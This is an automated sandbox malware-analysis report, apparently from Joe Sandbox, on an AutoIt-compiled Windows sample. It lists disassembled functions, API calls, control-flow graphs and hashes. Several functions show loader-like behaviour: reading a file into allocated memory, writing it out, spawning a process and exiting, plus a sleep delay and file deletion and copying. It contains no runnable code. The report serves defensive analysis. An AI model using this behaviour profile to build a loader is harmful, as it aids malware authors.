                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                    • String ID: TaskbarCreated
                                                                                                    • API String ID: 129472671-2362178303
                                                                                                    • Opcode ID: 2edc68201d05efd98f954ea10d67a9b9d4df90614a877b80b3327b2e6679b4ed
                                                                                                    • Instruction ID: ba846bb20cef8c81fe2198b1a0e060ae6452bb98a14d481ff58d05f993ca311c
                                                                                                    • Opcode Fuzzy Hash: 2edc68201d05efd98f954ea10d67a9b9d4df90614a877b80b3327b2e6679b4ed
                                                                                                    • Instruction Fuzzy Hash: 24412133240204AADF141F7C9D4ABBD3AA9EB57340F144626FA1A972E1CF618E8587B1

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 499 ad8d45-ad8d55 500 ad8d6f-ad8d71 499->500 501 ad8d57-ad8d6a call acf2c6 call acf2d9 499->501 502 ad90d9-ad90e6 call acf2c6 call acf2d9 500->502 503 ad8d77-ad8d7d 500->503 519 ad90f1 501->519 520 ad90ec call ad27ec 502->520 503->502 505 ad8d83-ad8dae 503->505 505->502 508 ad8db4-ad8dbd 505->508 511 ad8dbf-ad8dd2 call acf2c6 call acf2d9 508->511 512 ad8dd7-ad8dd9 508->512 511->520 517 ad8ddf-ad8de3 512->517 518 ad90d5-ad90d7 512->518 517->518 523 ad8de9-ad8ded 517->523 521 ad90f4-ad90f9 518->521 519->521 520->519 523->511 526 ad8def-ad8e06 523->526 528 ad8e08-ad8e0b 526->528 529 ad8e23-ad8e2c 526->529 532 ad8e0d-ad8e13 528->532 533 ad8e15-ad8e1e 528->533 530 ad8e2e-ad8e45 call acf2c6 call acf2d9 call ad27ec 529->530 531 ad8e4a-ad8e54 529->531 562 ad900c 530->562 535 ad8e5b-ad8e79 call ad3820 call ad29c8 * 2 531->535 536 ad8e56-ad8e58 531->536 532->530 532->533 537 ad8ebf-ad8ed9 533->537 566 ad8e7b-ad8e91 call acf2d9 call acf2c6 535->566 567 ad8e96-ad8ebc call ad9424 535->567 536->535 539 ad8fad-ad8fb6 call adf89b 537->539 540 ad8edf-ad8eef 537->540 551 ad9029 539->551 552 ad8fb8-ad8fca 539->552 540->539 544 ad8ef5-ad8ef7 540->544 544->539 548 ad8efd-ad8f23 544->548 548->539 553 ad8f29-ad8f3c 548->553 555 ad902d-ad9045 ReadFile 551->555 552->551 557 ad8fcc-ad8fdb GetConsoleMode 552->557 553->539 558 ad8f3e-ad8f40 553->558 560 ad9047-ad904d 555->560 561 ad90a1-ad90ac GetLastError 555->561 557->551 563 ad8fdd-ad8fe1 557->563 558->539 564 ad8f42-ad8f6d 558->564 560->561 570 ad904f 560->570 568 ad90ae-ad90c0 call acf2d9 call acf2c6 561->568 569 ad90c5-ad90c8 561->569 572 ad900f-ad9019 call ad29c8 562->572 563->555 571 ad8fe3-ad8ffd ReadConsoleW 563->571 564->539 573 ad8f6f-ad8f82 564->573 566->562 567->537 568->562 581 ad90ce-ad90d0 569->581 582 ad9005-ad900b call acf2a3 569->582 578 ad9052-ad9064 570->578 579 ad8fff GetLastError 571->579 580 ad901e-ad9027 571->580 572->521 573->539 574 ad8f84-ad8f86 573->574 574->539 585 ad8f88-ad8fa8 574->585 578->572 589 ad9066-ad906a 578->589 579->582 580->578 581->572 582->562 585->539 593 ad906c-ad907c call ad8a61 589->593 594 ad9083-ad908e 589->594 605 ad907f-ad9081 593->605 599 ad909a-ad909f call ad88a1 594->599 600 ad9090 call ad8bb1 594->600 606 ad9095-ad9098 599->606 600->606 605->572 606->605
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 239edeeb7162cd248c238098b3e07ef3a92935c49b2ee8570b034c1af28779c9
                                                                                                    • Instruction ID: 5fa911cc808a6f814534c00d48f03339f712f44f9340dbd1754bbebf117d8a22
                                                                                                    • Opcode Fuzzy Hash: 239edeeb7162cd248c238098b3e07ef3a92935c49b2ee8570b034c1af28779c9
                                                                                                    • Instruction Fuzzy Hash: 68C1E574904349AFDF11EFA8D841BEEBBB1BF19310F14405AE51AAB392CB34D941CB61

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 607 17c4398-17c43ea call 17c4298 CreateFileW 610 17c43ec-17c43ee 607->610 611 17c43f3-17c4400 607->611 612 17c454c-17c4550 610->612 614 17c4402-17c440e 611->614 615 17c4413-17c442a VirtualAlloc 611->615 614->612 616 17c442c-17c442e 615->616 617 17c4433-17c4459 CreateFileW 615->617 616->612 619 17c447d-17c4497 ReadFile 617->619 620 17c445b-17c4478 617->620 621 17c4499-17c44b6 619->621 622 17c44bb-17c44bf 619->622 620->612 621->612 623 17c44e0-17c44f7 WriteFile 622->623 624 17c44c1-17c44de 622->624 627 17c44f9-17c4520 623->627 628 17c4522-17c4547 CloseHandle VirtualFree 623->628 624->612 627->612 628->612
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 017C43DD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2067721187.00000000017C3000.00000040.00000020.00020000.00000000.sdmp, Offset: 017C3000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_17c3000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                    • Instruction ID: 80737fff84c0ee8913965f915019a59109cb54fcc4a3b52ed1cc09c11d72ade5
                                                                                                    • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                    • Instruction Fuzzy Hash: 0051EB75A50208FBEB20DFA4DC59FDEB778AF48B01F208558F60AEB180DA749644CB60

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 647 aa2c63-aa2cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                                    APIs
                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AA2C91
                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AA2CB2
                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00AA1CAD,?), ref: 00AA2CC6
                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00AA1CAD,?), ref: 00AA2CCF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CreateShow
                                                                                                    • String ID: AutoIt v3$edit
                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                    • Opcode ID: b4b1c560c882b7b68b3a7352c3e6b1e6ea4278e55b7f215f01d276a58eb430f6
                                                                                                    • Instruction ID: 654517136cac7bb3c8bf9c9ae99dfcf831e5f0ca6f49d396c91d233ab11100d2
                                                                                                    • Opcode Fuzzy Hash: b4b1c560c882b7b68b3a7352c3e6b1e6ea4278e55b7f215f01d276a58eb430f6
                                                                                                    • Instruction Fuzzy Hash: 80F0DA765503907AEB311B6FAC09E773EBDD7C6F50F12445AF908B35A0CA611890DAB8

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B12C05
                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00B12C87
                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B12C9D
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B12CAE
                                                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B12CC0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Delete$Copy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3226157194-0
                                                                                                    • Opcode ID: c6a17ecb8c961d34d4f0ccdee5d38abe476cfe6537d08d3f0f2ca16d405ab2ac
                                                                                                    • Instruction ID: 287c0587019e182a2bc7a20f09509a90c6d3f765c2f0445b1b4b16ed20e236d9
                                                                                                    • Opcode Fuzzy Hash: c6a17ecb8c961d34d4f0ccdee5d38abe476cfe6537d08d3f0f2ca16d405ab2ac
                                                                                                    • Instruction Fuzzy Hash: EFB14C72D00119ABDF11DBA4CD85EDEBBBDEF49350F5040AAF609E7141EB309A948FA1

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 868 17c5e68-17c5fcd call 17c3a78 call 17c5d58 CreateFileW 875 17c5fcf 868->875 876 17c5fd4-17c5fe4 868->876 877 17c60a1-17c60a6 875->877 879 17c5feb-17c6005 VirtualAlloc 876->879 880 17c5fe6 876->880 881 17c600c-17c6023 ReadFile 879->881 882 17c6007 879->882 880->877 883 17c6025 881->883 884 17c6027-17c603c call 17c4ae8 881->884 882->877 883->877 886 17c6041-17c607b call 17c5d98 call 17c4d58 884->886 891 17c607d-17c6092 call 17c5de8 886->891 892 17c6097-17c609f 886->892 891->892 892->877
                                                                                                    APIs
                                                                                                      • Part of subcall function 017C5D58: Sleep.KERNELBASE(000001F4), ref: 017C5D69
                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 017C5FC3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2067721187.00000000017C3000.00000040.00000020.00020000.00000000.sdmp, Offset: 017C3000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_17c3000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFileSleep
                                                                                                    • String ID: WAFMZYMK5ID403A8PGXS1PUT2D
                                                                                                    • API String ID: 2694422964-3466004450
                                                                                                    • Opcode ID: c4d00ab49a2bc44f0b84abade9a46165060c935c2c0599ffbcef42d9ec0de6a2
                                                                                                    • Instruction ID: 847afc2d31d54b5d3c7048294d5a902baedd36a3f43ddb64b9f9baac7f58f2b1
                                                                                                    • Opcode Fuzzy Hash: c4d00ab49a2bc44f0b84abade9a46165060c935c2c0599ffbcef42d9ec0de6a2
                                                                                                    • Instruction Fuzzy Hash: 0561A530D04288DAEF11DBB8C848BEEBB75AF15704F04419DE2487B2C1D7BA1B89CB65

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 931 aa3b1c-aa3b27 932 aa3b99-aa3b9b 931->932 933 aa3b29-aa3b2e 931->933 935 aa3b8c-aa3b8f 932->935 933->932 934 aa3b30-aa3b48 RegOpenKeyExW 933->934 934->932 936 aa3b4a-aa3b69 RegQueryValueExW 934->936 937 aa3b6b-aa3b76 936->937 938 aa3b80-aa3b8b RegCloseKey 936->938 939 aa3b78-aa3b7a 937->939 940 aa3b90-aa3b97 937->940 938->935 941 aa3b7e 939->941 940->941 941->938
                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00AA3B0F,SwapMouseButtons,00000004,?), ref: 00AA3B40
                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00AA3B0F,SwapMouseButtons,00000004,?), ref: 00AA3B61
                                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00AA3B0F,SwapMouseButtons,00000004,?), ref: 00AA3B83
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                    • String ID: Control Panel\Mouse
                                                                                                    • API String ID: 3677997916-824357125
                                                                                                    • Opcode ID: 369f0fe24d2bac802ef00e719e7d5b9bdacdb6263c8dc3b08a069fa9e64e9ed2
                                                                                                    • Instruction ID: 1c6c3f77131a88db3264d5a5e5ac40caa71353114347710129561b951e150dc0
                                                                                                    • Opcode Fuzzy Hash: 369f0fe24d2bac802ef00e719e7d5b9bdacdb6263c8dc3b08a069fa9e64e9ed2
                                                                                                    • Instruction Fuzzy Hash: EB112AB6511208FFDF218FA5DC85AAEBBB9EF05744B104459B806E7150D7719E409760
                                                                                                    Strings
                                                                                                    • Variable must be of type 'Object'., xrefs: 00AF32B7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Variable must be of type 'Object'.
                                                                                                    • API String ID: 0-109567571
                                                                                                    • Opcode ID: 3e0d67a6b570d5edfe9625fdc15ad4a32f40ef2c37d87e9d54b053558be620f6
                                                                                                    • Instruction ID: 62852d6c09eb4c2ca203595fdd0ca022650f651a3cdb9b8621f08b72396b1f4d
                                                                                                    • Opcode Fuzzy Hash: 3e0d67a6b570d5edfe9625fdc15ad4a32f40ef2c37d87e9d54b053558be620f6
                                                                                                    • Instruction Fuzzy Hash: 8CC26771A00215CFCF24CF98C881AADB7F1FF5A310F248569E916AB291D775ED81CBA1
                                                                                                    APIs
                                                                                                    • __Init_thread_footer.LIBCMT ref: 00AAFE66
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Init_thread_footer
                                                                                                    • String ID:
                                                                                                    • API String ID: 1385522511-0
                                                                                                    • Opcode ID: f9e9f00e87bd31ed4c711b9bc3918f15de89858c7cd837037525135745b7547c
                                                                                                    • Instruction ID: 6b6bb12bea8775fc60dd5c8cff66762827b69d37eb06894ae63e7adb823fe618
                                                                                                    • Opcode Fuzzy Hash: f9e9f00e87bd31ed4c711b9bc3918f15de89858c7cd837037525135745b7547c
                                                                                                    • Instruction Fuzzy Hash: FFB27A74A08340CFCB28CF58C480A2AB7F1BB9A314F24496DF9999B391D771EC45CB92
                                                                                                    APIs
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00AC0668
                                                                                                      • Part of subcall function 00AC32A4: RaiseException.KERNEL32(?,?,?,00AC068A,?,00B71444,?,?,?,?,?,?,00AC068A,00AA1129,00B68738,00AA1129), ref: 00AC3304
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00AC0685
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                                    • String ID: Unknown exception
                                                                                                    • API String ID: 3476068407-410509341
                                                                                                    • Opcode ID: f2917d064b3f4f0ce3e1d9302fa3ff5c04df10dd9c93195a671292a3151a551e
                                                                                                    • Instruction ID: 2379d29aa15c45dc296b77c399c313ca54fe0eda36105070e9f236722beee241
                                                                                                    • Opcode Fuzzy Hash: f2917d064b3f4f0ce3e1d9302fa3ff5c04df10dd9c93195a671292a3151a551e
                                                                                                    • Instruction Fuzzy Hash: B9F0C23490020DBB8F00BB64DD4AEDE7BAC5E00354F618579B814D65A2EFB1DA25C680
                                                                                                    APIs
                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 017C4ABD
                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 017C4ADC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2067721187.00000000017C3000.00000040.00000020.00020000.00000000.sdmp, Offset: 017C3000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_17c3000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CreateExit
                                                                                                    • String ID: D
                                                                                                    • API String ID: 126409537-2746444292
                                                                                                    • Opcode ID: 4638e4dcbcb64820f1c19d6545d26c0fb6ea82a3cd30bab000e26f1f9ebc6855
                                                                                                    • Instruction ID: bafb5ff288a5ae9d436cec4a1ec9bbb776d540117adc107032cedf96742e4af8
                                                                                                    • Opcode Fuzzy Hash: 4638e4dcbcb64820f1c19d6545d26c0fb6ea82a3cd30bab000e26f1f9ebc6855
                                                                                                    • Instruction Fuzzy Hash: ABF0EC7154024CABDF60EFE4CC49FEEB778BF48B01F44850CBB0A9A184DA7496488B61
                                                                                                    APIs
                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00B1302F
                                                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00B13044
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Temp$FileNamePath
                                                                                                    • String ID: aut
                                                                                                    • API String ID: 3285503233-3010740371
                                                                                                    • Opcode ID: 88d1f87cff392d4d0d3b1bf1f5d99104bb84361694049390f1fd79b18db159ae
                                                                                                    • Instruction ID: d0f77de379d5532870f631cfd3f167c996d42a227e90dec48ff3a68bc35dfb95
                                                                                                    • Opcode Fuzzy Hash: 88d1f87cff392d4d0d3b1bf1f5d99104bb84361694049390f1fd79b18db159ae
                                                                                                    • Instruction Fuzzy Hash: 20D05E7254032867DA20A7E4AC0EFCB3F6CDB04750F0002A1BA55E30A1DEB49984CBD0
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00B282F5
                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00B282FC
                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 00B284DD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 146820519-0
                                                                                                    • Opcode ID: b00bb7d392a3e9fb46bd69f9f85f2ba6b853db432d2ff1f1e5060d3a9ba8657f
                                                                                                    • Instruction ID: edcdb04ed8f513ed5c04133d509c9acce9e6c4dc2db73653db593a7fed14a79e
                                                                                                    • Opcode Fuzzy Hash: b00bb7d392a3e9fb46bd69f9f85f2ba6b853db432d2ff1f1e5060d3a9ba8657f
                                                                                                    • Instruction Fuzzy Hash: F1127B719083119FD714DF28D480B6ABBE5FF89318F14899DE8998B392CB31ED45CB92
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a3765a17a088ad00a94604bc2f1e24b3ff6f8bdbeb21de5c8706ec742e1e045d
                                                                                                    • Instruction ID: 2e863dba7697eb9b513e51b97f007d382b624d0aafe471c1628d29b9da0e7518
                                                                                                    • Opcode Fuzzy Hash: a3765a17a088ad00a94604bc2f1e24b3ff6f8bdbeb21de5c8706ec742e1e045d
                                                                                                    • Instruction Fuzzy Hash: 1D519D75D10A09AFDB21AFB8C945FEEBBB8AF05310F14005BF406AB391D7719A01DB61
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AA1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AA1BF4
                                                                                                      • Part of subcall function 00AA1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00AA1BFC
                                                                                                      • Part of subcall function 00AA1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AA1C07
                                                                                                      • Part of subcall function 00AA1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AA1C12
                                                                                                      • Part of subcall function 00AA1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00AA1C1A
                                                                                                      • Part of subcall function 00AA1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00AA1C22
